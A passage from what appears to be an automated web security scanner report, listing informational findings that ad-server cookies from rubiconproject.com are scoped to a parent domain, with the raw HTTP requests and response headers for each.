2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^7&12590^5; rdk=7856/12590; rdk2=0; ses2=12338^10&12590^5

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4e8588ddc30f9fd9f878d610^&12590^65&12338^53; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63604; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3165015.js^2^1315405194^1315405195&3151969.js^11^1315405176^1315405190&3150144.js^1^1315405186^1315405186&3178849.js^1^1315405181^1315405181&3151650.js^2^1315405172^1315405175&3196947.js^2^1315405168^1315405171&3188306.js^1^1315405169^1315405169&3186719.js^1^1315405168^1315405168&3212309.js^1^1315405167^1315405167&3199969.js^1^1315405166^1315405166; expires=Wed, 14-Sep-2011 14:19:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1654

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.28. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.520786275388673&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^11&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^18&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:30:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^76&12590^78; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62996; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2908

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.29. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.html?cb=0.3859964762814343&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^11&12590^9; rdk=7725/12338; rdk2=0; ses2=12338^19&12590^7; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:51 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^15&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62888; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3151964.js^2^1315405891^1315405911&3152310.js^3^1315405830^1315405906&3151648.js^2^1315405815^1315405861&3196945.js^2^1315405767^1315405804&3165011.js^3^1315405775^1315405790&3199967.js^1^1315405763^1315405763; expires=Wed, 14-Sep-2011 14:31:51 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2269

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.30. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; ses15=12338^3&12590^2; csi15=3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:31 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^5&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196947.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1858

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.31. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.html?cb=0.6520654342602938&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^7; rdk=7725/12338; ses2=12338^14&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^84; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63532; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2928

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.32. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.html?cb=0.6706412732601166&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^18&12590^6; rdk=7856/12590; ses15=12338^11&12590^9

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:30:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^1&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62962; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.33. http://optimized-by.rubiconproject.com/a/dk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^119&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3151648.js^1^1315404888^1315404888&3152310.js^1^1315404888^1315404888&3165011.js^3^1315404888^1315404888&3196945.js^1^1315404887^1315404887&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^268308726; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1733

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151648"
...[SNIP]...

8.34. http://optimized-by.rubiconproject.com/a/dk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D31733135.js&size_id=15&account_id=7856&site_id=12590&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=0; 